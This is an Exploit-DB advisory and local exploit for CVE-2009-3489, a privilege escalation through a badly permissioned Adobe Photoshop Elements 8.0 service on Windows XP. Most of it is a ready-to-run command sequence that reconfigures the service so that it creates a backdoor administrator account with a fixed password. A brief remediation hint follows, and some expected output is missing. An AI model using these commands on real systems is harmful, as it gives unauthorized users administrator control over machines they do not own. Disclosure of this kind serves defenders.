Adobe Photoshop Elements 8.0 - Active File Monitor Privilege Escalation

ID EDB-ID:9807
Type exploitdb
Reporter pyrokinesis
Modified 2009-09-29T00:00:00


Adobe Photoshop Elements 8.0 Active File Monitor Privilege Escalation. CVE-2009-3489. Local exploit for windows platform

                                            Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security Descriptor Local Elevation Of Privileges
by Nine:Situations:Group::bellick

Tested on Microsoft Windows XP SP3

The "Adobe Active File Monitor V8" service is installed with an improper security descriptor.
A malicious user of the Users group (which on xp means a "limited account") can stop the service,
then invoke the "sc config" command to replace the binary path with a value of choice, then restart
the service to run the command with SYSTEM privileges ex., run theese commands as a limited user:

sc stop "AdobeActiveFileMonitor8.0"
sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
sc start "AdobeActiveFileMonitor8.0"
runas /noprofile /user:%COMPUTERNAME%\adobe cmd

now login as administrator with password "kills"


the security descriptor of the service is like this:

C:\>sc sdshow "AdobeActiveFileMonitor8.0"


note the WO and WD permission for Everyone (!!!!!)

change the security descriptor like the following:

[SC] SetServiceObjectSecurity SUCCESS

readings, interesting article: